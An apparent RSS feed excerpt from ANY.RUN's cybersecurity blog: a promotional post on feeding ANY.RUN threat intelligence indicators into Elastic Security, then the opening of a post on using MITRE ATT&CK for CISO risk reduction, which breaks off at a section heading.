<p>Through the ANY.RUN Threat Intelligence Feeds integration, organizations can ingest third-party threat indicators into Elastic Security and use them in detection, investigation, and threat intelligence workflows. This helps analysts bring external threat context into the same platform they use for security operations. &nbsp;&nbsp;</p>



<p>ANY.RUN’s&nbsp;<a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=anyrun-elastic-security&amp;utm_term=120526&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Feeds</a>&nbsp;are built from&nbsp;<a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=anyrun-elastic-security&amp;utm_term=120526&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">live sandbox investigations</a>&nbsp;across more than 15,000 organizations and 600,000 SOC professionals. Indicators reflect infrastructure actively used in phishing, malware delivery, and attacker campaigns, not delayed or aggregated data. Each&nbsp;<a href="https://any.run/cybersecurity-blog/enrich-iocs-with-threat-intelligence/" target="_blank" rel="noreferrer noopener">IOC&nbsp;includes context</a>&nbsp;and a direct link to the sandbox report, allowing analysts to quickly understand threat behavior and TTPs.&nbsp;&nbsp;</p>



<p>The&nbsp;<a href="https://www.elastic.co/docs/reference/integrations/ti_anyrun" target="_blank" rel="noreferrer noopener">integration is available as a plug-and-play solution</a>&nbsp;that only requires an active TI Feeds license (via trial or a paid subscription).&nbsp;&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="505" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-11.58.36-1024x505.png" alt="" class="wp-image-20807" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-11.58.36-1024x505.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-11.58.36-300x148.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-11.58.36-768x379.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-11.58.36-1536x757.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-11.58.36-2048x1010.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-11.58.36-370x182.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-11.58.36-270x133.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-12-at-11.58.36-740x365.png 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>IOC overview of Threat Intelligence Feeds&nbsp;inside&nbsp;Elastic Security</em>&nbsp;</figcaption></figure></div>


<p>Once configured, Elastic&nbsp;Security can ingest indicators such as IPs, domains, and URLs from the integration on a scheduled basis. Those indicators can then be used across supported detection, investigation, and visualization workflows.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</p>



<p>The&nbsp;additional&nbsp;context associated with ingested indicators can help analysts triage and investigate alerts more efficiently.&nbsp;&nbsp;</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Bring fresh, sandbox-backed IOCs into your SOC workflows.</span><br>
Give your team the context to investigate faster and reduce business risk.</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/plans-ti/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=anyrun-elastic-security&#038;utm_content=linktotipricing#contact-sales" rel="noopener" target="_blank">
Contact us
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">How Threat&nbsp;Intelligence&nbsp;Feeds Improve Detection and Shorten MTTR in Elastic Security&nbsp;&nbsp;</h2>



<p>The integration embeds threat intelligence directly into daily SOC workflows inside Elastic Security. Analysts&nbsp;don’t&nbsp;need to manually check indicators in external tools or move data between systems.&nbsp;&nbsp;</p>



<p>Here is what your team gains:&nbsp;&nbsp;</p>



<ul class="wp-block-list">
<li><strong>Detect threats early:</strong>&nbsp;Use fresh indicators from live attacks to&nbsp;identify&nbsp;malicious activity sooner. &nbsp;&nbsp;</li>



<li><strong>Validate alerts with real context:</strong>&nbsp;Use sandbox-backed evidence instead of relying only on static indicators. &nbsp;</li>



<li><strong>Reduce manual work:</strong>&nbsp;Eliminate&nbsp;repetitive enrichment steps and tool switching.&nbsp;&nbsp;</li>



<li><strong>Improve detection quality:</strong>&nbsp;Use high-confidence indicators directly in rules and correlation logic. &nbsp;&nbsp;</li>



<li><strong>Speed up triage and response:</strong>&nbsp;Access context instantly and make faster decisions. &nbsp;&nbsp;</li>
</ul>



<p>Together, these improvements help reduce MTTD and MTTR, lower incident response costs, and increase analyst efficiency by enabling teams to handle more cases without expanding headcount.&nbsp;</p>



<p>Better detection coverage and earlier visibility into active threats contribute to overall business risk reduction by limiting the impact and spread of attacks.&nbsp;&nbsp;</p>



<h2 class="wp-block-heading">How to Set Up ANY.RUN’s Threat&nbsp;Intelligence&nbsp;Feeds in Elastic Security&nbsp;&nbsp;</h2>



<p>The integration is designed to be simple and flexible. Once you get an active TI Feeds access, you can&nbsp;<a href="https://www.elastic.co/docs/reference/integrations/ti_anyrun" target="_blank" rel="noreferrer noopener">navigate to the integration page</a>&nbsp;and follow the instructions.&nbsp;&nbsp;</p>



<p>Indicators are automatically ingested into Elastic and continuously updated. They become part of detection, search, and response workflows.&nbsp;&nbsp;</p>



<p>With ANY.RUN Threat Intelligence Feeds in Elastic Security, teams can:&nbsp;&nbsp;</p>



<ul class="wp-block-list">
<li>Use ingested ANY.RUN indicators in Elastic Security detection workflows&nbsp;&nbsp;</li>



<li>Match threat indicators against relevant security telemetry &nbsp;</li>



<li>Support triage and investigation with&nbsp;additional&nbsp;indicator context&nbsp;&nbsp;</li>



<li>Build dashboards and visualizations for threat intelligence monitoring&nbsp;&nbsp;</li>



<li>Incorporate third-party indicators into detection and hunting workflows&nbsp;&nbsp;</li>
</ul>



<h2 class="wp-block-heading">Conclusion&nbsp;&nbsp;</h2>



<p>With ANY.RUN Threat Intelligence Feeds integrated into&nbsp;<a href="https://www.elastic.co/campaigns/guide-to-high-volume-data-sources-for-siem?utm_campaign=G-TXT-AMER-NA-Security-EN-Lead_Gen-MQL-NB&amp;utm_content=Security-Analytics&amp;utm_source=google&amp;utm_medium=cpc&amp;device=c&amp;utm_term=ai%20and%20cybersecurity&amp;utm_id=7018X0000017RryQAE&amp;gad_source=1&amp;gad_campaignid=22944792370&amp;gbraid=0AAAAADrDgoJf1pYB9GNyHJNWujOBTEoBo&amp;gclid=Cj0KCQjwh-HPBhCIARIsAC0p3cfUJnaxgTtS91g-bKYxYkI1YZ0GXne9dnEoVMo8W2o4xl2MiP3LO_UaAiECEALw_wcB" target="_blank" rel="noreferrer noopener">Elastic’s Security&nbsp;</a>&nbsp;platform can further enhance customer’s security detection with&nbsp;timely, behavior-validated intelligence., Organizations can detect threats early, reduce manual effort, and make fast, confident decisions. &nbsp;&nbsp;</p>



<p>This leads not only to better SOC performance, but also to measurable business impact. Early detection, fast response, and improved signal quality help reduce the likelihood and impact of incidents,&nbsp;ultimately lowering&nbsp;overall business risk.&nbsp;&nbsp;</p>



<h2 class="wp-block-heading">About ANY.RUN&nbsp;&nbsp;</h2>



<p>ANY.RUN helps security teams understand threats faster and&nbsp;take action&nbsp;with confidence. Its solutions are trusted by over 600,000 security professionals and more than&nbsp;<a href="https://any.run/cybersecurity-blog/threat-intelligence-from-organizations/" target="_blank" rel="noreferrer noopener">15,000 organizations</a>&nbsp;across industries where speed and accuracy are critical for effective response.&nbsp;&nbsp;</p>



<p><a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=anyrun-elastic-security&amp;utm_term=120526&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">ANY.RUN’s Interactive Sandbox</a>&nbsp;allows&nbsp;teams to safely analyze suspicious files and URLs,&nbsp;observe&nbsp;real behavior in real time, and confirm threats before they spread.&nbsp;&nbsp;</p>



<p>Combined with&nbsp;<a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=anyrun-elastic-security&amp;utm_term=120526&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Lookup</a>&nbsp;and&nbsp;<a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=anyrun-elastic-security&amp;utm_term=120526&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Feeds</a>, it provides the context needed to prioritize alerts, reduce uncertainty, and stop advanced attacks earlier in the response cycle.&nbsp;&nbsp;</p>



<p><a href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=anyrun-elastic-security&amp;utm_term=120526&amp;utm_content=linktoenterprise#contact-sales" target="_blank" rel="noreferrer noopener">Request access to ANY.RUN’s solutions →</a>&nbsp;&nbsp;</p>
<p>The post <a rel="nofollow" href="https://any.run/cybersecurity-blog/anyrun-elastic-security/">ANY.RUN &amp; Elastic Security: Bring Threat Intelligence into Detection and Investigation Workflows      </a> appeared first on <a rel="nofollow" href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://any.run/cybersecurity-blog/anyrun-elastic-security/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>How CISOs Reduce Cyber Risk with MITRE ATT&amp;CK </title>
		<link>https://any.run/cybersecurity-blog/mitre-ciso-risk-reduction/</link>
					<comments>https://any.run/cybersecurity-blog/mitre-ciso-risk-reduction/#respond</comments>
		
		<dc:creator><![CDATA[ANY.RUN]]></dc:creator>
		<pubDate>Wed, 06 May 2026 09:31:54 +0000</pubDate>
				<category><![CDATA[Cybersecurity Lifehacks]]></category>
		<category><![CDATA[ANYRUN]]></category>
		<category><![CDATA[CISO]]></category>
		<category><![CDATA[malware behavior]]></category>
		<category><![CDATA[MITRE ATT&CK]]></category>
		<category><![CDATA[risks]]></category>
		<guid isPermaLink="false">https://any.run/cybersecurity-blog/?p=20735</guid>

					<description><![CDATA[<p>Nowadays&#160;CISOs&#160;face escalating threats that outpace traditional defenses. The strategy is evolving from compliance-driven checklists to a threat-informed approach. MITRE ATT&#38;CK provides a globally accessible knowledge base of real-world adversary tactics, techniques, and procedures (TTPs), enabling organizations to understand, prioritize, and counter actual attacker behaviors rather than abstract controls.&#160;&#160;This shift helps align security efforts with business [&#8230;]</p>
<p>The post <a rel="nofollow" href="https://any.run/cybersecurity-blog/mitre-ciso-risk-reduction/">How CISOs Reduce Cyber Risk with MITRE ATT&amp;CK </a> appeared first on <a rel="nofollow" href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Nowadays&nbsp;CISOs&nbsp;face escalating threats that outpace traditional defenses. The strategy is evolving from <strong>compliance-driven checklists to a threat-informed approach</strong>. MITRE ATT&amp;CK provides a globally accessible knowledge base of real-world adversary tactics, techniques, and procedures (TTPs), enabling organizations to understand, prioritize, and counter actual attacker behaviors rather than abstract controls.&nbsp;<br>&nbsp;<br>This shift helps align security efforts with business realities: minimizing downtime, protecting revenue streams, safeguarding customer trust, and potentially lowering cyber insurance premiums through&nbsp;demonstrated&nbsp;proactive risk management.&nbsp;</p>



<h2 class="wp-block-heading">Executive Summary&nbsp;</h2>



<ul class="wp-block-list">
<li>Compliance-driven security measures control maturity, not adversary readiness. Threat-informed defense anchors risk management in real attack behaviors, which is where actual risk lives.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>MITRE ATT&amp;CK provides&nbsp;the taxonomy, not&nbsp;the intelligence. The framework names and&nbsp;structures&nbsp;adversary techniques; organizations need curated, real-world threat data to make those techniques actionable.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>SOC workflow integration is non-negotiable. MITRE ATT&amp;CK delivers risk reduction only when embedded into monitoring rules, triage processes, IR playbooks, and hunt methodologies.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Speed of context determines security outcomes. Whether in triage or incident response, the time it takes to understand what a threat is doing directly determines how much damage it can cause. ANY.RUN&#8217;s <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mitre-ciso-risk-reduction&amp;utm_term=060526&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Lookup</a> and <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mitre-ciso-risk-reduction&amp;utm_term=060526&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Sandbox </a>compress that context-gathering from hours to seconds. </li>
</ul>



<ul class="wp-block-list">
<li>Threat hunting requires real attack patterns, not just technique categories. Generic ATT&amp;CK-based hunt queries produce noise; high-fidelity feeds of current attacker behavior&nbsp;produce findings.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Risk reduction is measurable. MTTD, MTTR, MTTC, hunt yield rate, and false positive ratios are the business-level metrics that translate MITRE ATT&amp;CK investment into language boards and insurers understand.&nbsp;</li>
</ul>



<h2 class="wp-block-heading">Two Lenses, One Risk: Compliance vs. Adversary-Centered&nbsp;Approach&nbsp;</h2>



<p><strong>Traditional risk management</strong>&nbsp;often relies on vulnerability scanning, compliance audits (e.g., NIST, ISO), and static controls. It focuses on known weaknesses and regulatory requirements but&nbsp;frequently&nbsp;misses how attackers chain behaviors in live environments.&nbsp;</p>



<p><strong>MITRE ATT&amp;CK</strong>&nbsp;is adversary-centric and behavior-focused. It maps real-world TTPs across tactics like Initial Access, Execution, Persistence, and Impact. This enables gap analysis, threat modeling, and measurable improvements in detection and response.&nbsp;</p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-313"
           style="border-collapse:collapse;
                   border-spacing:1px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="3"
           data-rows="8"
           data-wpID="313"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bold wpdt-fs-000014 wpdt-bc-03A9F4"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:18.509316770186%;                    padding:10px;
                    "
                    >
                                        Dimension                     </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-fs-000014 wpdt-bc-03A9F4"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:37.76397515528%;                    padding:10px;
                    "
                    >
                                        Traditional Risk Management                     </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-fs-000014 wpdt-bc-03A9F4"
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:43.726708074534%;                    padding:10px;
                    "
                    >
                                        MITRE ATT&CK Approach                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Risk Basis                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Regulatory requirements & audit findings                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Real-world adversary techniques & behaviors                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Threat Model                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Generic, category-level threats                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Specific ATT&CK tactics, techniques, sub-techniques                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Detection Focus                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Signature-based, perimeter controls                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Behavioral analytics across the kill chain                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Measurement                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Control maturity, audit pass/fail                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C5"
                    data-col-index="2"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Detection coverage mapped to ATT&CK matrix                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Response Approach                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Incident → remediation → compliance update                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C6"
                    data-col-index="2"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Continuous detection, hunt, iterate                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Business Language                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Risk scores, audit gaps                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C7"
                    data-col-index="2"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Mapped MITRE techniques tied to business impact                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A8"
                    data-col-index="0"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        Tooling                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B8"
                    data-col-index="1"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        GRC platforms, scanners                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C8"
                    data-col-index="2"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        SIEM + EDR + Sandbox + TI Feeds                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-313'>
table#wpdtSimpleTable-313{ table-layout: fixed !important; }
table#wpdtSimpleTable-313 td, table.wpdtSimpleTable313 th { white-space: normal !important; }
.wpdt-fs-000014 { font-size: 14px !important;}
.wpdt-bc-03A9F4 { background-color: #03A9F4 !important;}
.wpdt-fs-000012 { font-size: 12px !important;}
</style>




<p>The most important takeaway from this comparison is not that compliance is worthless. It&nbsp;isn&#8217;t. Regulatory requirements create accountability, force documentation, and&nbsp;establish&nbsp;minimum hygiene floors that matter for smaller organizations with limited resources. The problem arises when compliance becomes the ceiling rather than the floor.&nbsp;</p>



<h2 class="wp-block-heading">Where Strategy Meets Reality: Making MITRE ATT&amp;CK Operational&nbsp;</h2>



<p><a href="https://any.run/cybersecurity-blog/mitre-attack/" target="_blank" rel="noreferrer noopener">MITRE ATT&amp;CK is not a product</a>. It does not detect threats. It does not alert your analysts,&nbsp;contain&nbsp;attackers, or generate threat intelligence.&nbsp;The organizations that extract real risk reduction from MITRE ATT&amp;CK are those that connect the&nbsp;framework&#8217;s&nbsp;taxonomy directly to how their SOC actually operates: the tools analysts use, the data they see, the workflows they follow under pressure. </p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-314"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="4"
           data-rows="5"
           data-wpID="314"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bold wpdt-align-center wpdt-bc-03A9F4 wpdt-fs-000014"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:12.354521038496%;                    padding:10px;
                    "
                    >
                                        SOC Workflow                     </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-align-center wpdt-bc-03A9F4 wpdt-fs-000014"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:18.173679498657%;                    padding:10px;
                    "
                    >
                                        What MITRE Provides                     </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-align-center wpdt-bc-03A9F4 wpdt-fs-000014"
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:21.48612354521%;                    padding:10px;
                    "
                    >
                                        What SOC Actually Needs                     </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-align-center wpdt-bc-03A9F4 wpdt-fs-000014"
                                            data-cell-id="D1"
                    data-col-index="3"
                    data-row-index="0"
                    style=" width:47.985675917637%;                    padding:10px;
                    "
                    >
                                        How ANY.RUN Bridges the Gap                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-align-left wpdt-italic wpdt-fs-000012"
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Monitoring                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Identify techniques to watch                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Alerts linked to ATT&CK IDs                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-tc-000000 wpdt-bc-CCE0EA wpdt-fs-000012 wpdt-bold"
                                            data-cell-id="D2"
                    data-col-index="3"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        TI Feeds: live IOC & technique feeds; Sandbox: real-time detonation signals                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-align-left wpdt-italic wpdt-fs-000012"
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Triage                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Explain technique & impact                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Fast analyst context on behavior                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-bc-CCE0EA wpdt-fs-000012 wpdt-bold"
                                            data-cell-id="D3"
                    data-col-index="3"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        TI Lookup: instant technique context + related samples; Sandbox: behavioral report                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-align-left wpdt-italic wpdt-fs-000012"
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Incident Response                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Provide structural framework                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Full execution context to contain                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-bc-CCE0EA wpdt-fs-000012 wpdt-bold"
                                            data-cell-id="D4"
                    data-col-index="3"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Sandbox: full process tree, network, registry; TI Lookup: lateral movement history                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-align-left wpdt-italic wpdt-fs-000012"
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Threat Hunting                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Suggest what to search for                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C5"
                    data-col-index="2"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Real attack patterns as hypotheses                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-bc-CCE0EA wpdt-fs-000012 wpdt-bold"
                                            data-cell-id="D5"
                    data-col-index="3"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        TI Feeds: emerging technique clusters; TI Lookup: hunt pivot on IOCs & TTPs                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-314'>
table#wpdtSimpleTable-314{ table-layout: fixed !important; }
table#wpdtSimpleTable-314 td, table.wpdtSimpleTable314 th { white-space: normal !important; }
.wpdt-bc-03A9F4 { background-color: #03A9F4 !important;}
.wpdt-fs-000014 { font-size: 14px !important;}
.wpdt-fs-000012 { font-size: 12px !important;}
.wpdt-tc-000000 { color: #000000 !important;}
.wpdt-bc-CCE0EA { background-color: #CCE0EA !important;}
</style>




<h2 class="wp-block-heading">1.&nbsp;Eyes Wide Open: Enhancing Monitoring for Early Threat Detection&nbsp;</h2>



<p>MITRE ATT&amp;CK is a powerful compass for monitoring strategy. It tells defenders which techniques adversaries use during specific phases of an attack.&nbsp;T1566 (Phishing) for&nbsp;initial&nbsp;access, T1055 (Process Injection) for defense evasion, T1021 (Remote Services) for lateral movement,&nbsp;etc. Security teams can use the framework to build detection hypotheses, design SIEM rules, and prioritize which telemetry sources to collect.&nbsp;</p>



<h3 class="wp-block-heading">What the SOC Actually Needs&nbsp;</h3>



<p>The value of monitoring&nbsp;emerges&nbsp;from early visibility to enable swift action, reducing dwell&nbsp;time&nbsp;and limiting blast radius.&nbsp;Analysts need alerts with sufficient fidelity and timeliness to intervene while the attack is still in progress. That requires not just knowing which techniques&nbsp;exist, but&nbsp;understanding the current threat landscape:&nbsp;which groups are active, which malware families are being deployed this week, and which detection signatures are already stale.&nbsp;</p>



<h3 class="wp-block-heading">Solution: Stay Current with Live Threat Feeds to Cut Detection Lag&nbsp;</h3>



